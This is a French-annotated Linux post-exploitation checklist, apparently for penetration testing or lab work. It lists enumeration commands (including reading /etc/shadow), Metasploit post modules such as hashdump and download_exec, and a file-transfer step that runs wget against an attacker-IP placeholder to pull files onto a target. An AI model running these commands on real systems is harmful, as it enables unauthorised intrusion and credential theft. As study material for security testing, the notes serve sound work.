Checklist

1- Local Enumeration

meterpreter> sysinfo #info systeme

#bash commands
hostname
cat /etc/*release
cat /etc/issue
uname -a
cat /proc/version
lscpu
lsblk
df -h
mount -l
dpkg -l | rpm -qa
printenv
free -h
meterpreter> getuid
#bash commands
whoami
id
groups <username>
cat /etc/passwd
cat /etc/group
cat /etc/shadow
who
last
lastlog
meterpreter> ifconfig
meterpretr> netstat -tulnp
meterpreter> route 
# ou netstat -rn
meterpreter> arp -a

#bash
ip a s
cat /etc/networks #plus lisible !
cat /etc/hostname #Target network name
cat /etc/hosts #IP/name resolution
cat /etc/resolv.conf #dns
resolvectl
ss -tulnp #processes
route
arp -a

meterpreter> ps
#bash
ps -ef | aux
top
crontab -l
cat /etc/cron
ls -al /etc/cron*

MSF Enumeration (post exploitation)


post/linux/gather/enum_configs
# Recueille les configurations système type SELINUX / Apparmor pour l'analyse de l'environnement.

post/multi/gather/env
# Récupère les variables d'environnement, potentiellement sensibles.

post/linux/gather/enum_network
# Collecte les informations réseau pour analyser les connexions et interfaces.

post/linux/gather/enum_protections
# Vérifie les protections de sécurité actives sur le système.

post/linux/gather/enum_system
# Récupère des informations générales sur le système cible.

post/linux/gather/checkcontainer
# Détecte si le système est exécuté dans un conteneur.

post/linux/gather/checkvm
# Vérifie si la machine est virtuelle, ce qui influence les attaques.

post/linux/gather/enum_users_history
# Récupère l'historique des utilisateurs et des commandes exécutées.

post/linux/gather/hashdump
# Extrait les mots de passe hachés des utilisateurs du système.

msf> loot
# Affiche les informations et fichiers collectés lors de l'exploitation.

post/multi/manage/system_session
# Permet de gérer et contrôler les sessions système ouvertes.

post/linux/manage/download_exec
# Télécharge et exécute des fichiers sur la machine cible.

Autres scripts

https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS

https://github.com/rebootuser/LinEnum

2- File Transfer

python -m http.server 80 #python3 web server on Attacker
python -m SimpleHTTPServer 80 #python2
wget http://<attacker_IP>/<filename>  #download from Linux target

3-Upgrade shells